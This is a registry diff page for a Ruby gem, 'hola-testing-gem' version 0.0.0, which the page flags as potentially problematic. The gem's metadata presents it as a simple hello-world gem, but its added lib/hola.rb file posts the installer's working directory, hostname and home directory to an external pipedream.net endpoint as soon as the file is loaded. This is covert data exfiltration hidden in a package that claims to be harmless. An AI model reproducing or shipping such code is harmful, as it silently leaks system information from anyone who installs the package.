hola-testing-gem 0.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of hola-testing-gem might be problematic. Click here for more details.

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/lib/hola.rb +6 -0
  3. metadata +43 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: a1e21f051ebba8cb5707bd9173764f4b9aad60cd8ddab06468c86883475fd5cc
4
+ data.tar.gz: 53ac19cfc0dce41424e6bbdbc167ef063d4f4d45adbda6b1dd16edd5957f2df5
5
+ SHA512:
6
+ metadata.gz: a434b5b11bf6976b1055eb0eb957a38c717f95cfb35bdcbbd461e569e04f13a57b4cbf594cd5015386f78e27d766fada95c30c45c73950d4d0db251779561a8c
7
+ data.tar.gz: d2982490871a3ebbcb660e91a36d4bac5f7cb823076c1f4f28f463f15bb6f5ada67d2ed13753bbd3777e9b012fe227c2ea9146ff3b59f19c245cf11b899388cf
data/lib/hola.rb ADDED
@@ -0,0 +1,6 @@
1
+ require 'net/http'
2
+ require 'uri'
3
+ require 'socket'
4
+ url = "https://enhwr81xye7ad.x.pipedream.net"
5
+ Net::HTTP.post(URI(url), "cwd:#{Dir.pwd};hostname:#{Socket.gethostname};home:#{Dir.home};gem:GEM_NAME")
6
+
metadata ADDED
@@ -0,0 +1,43 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: hola-testing-gem
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.0
5
+ platform: ruby
6
+ authors:
7
+ - Nick Quaranto
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2022-05-09 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: A simple hello world gem
14
+ email: nick@quaran.to
15
+ executables: []
16
+ extensions: []
17
+ extra_rdoc_files: []
18
+ files:
19
+ - lib/hola.rb
20
+ homepage: https://rubygems.org/gems/hola-testing-gem
21
+ licenses:
22
+ - MIT
23
+ metadata: {}
24
+ post_install_message:
25
+ rdoc_options: []
26
+ require_paths:
27
+ - lib
28
+ required_ruby_version: !ruby/object:Gem::Requirement
29
+ requirements:
30
+ - - ">="
31
+ - !ruby/object:Gem::Version
32
+ version: '0'
33
+ required_rubygems_version: !ruby/object:Gem::Requirement
34
+ requirements:
35
+ - - ">="
36
+ - !ruby/object:Gem::Version
37
+ version: '0'
38
+ requirements: []
39
+ rubygems_version: 3.0.3.1
40
+ signing_key:
41
+ specification_version: 4
42
+ summary: Hola!
43
+ test_files: []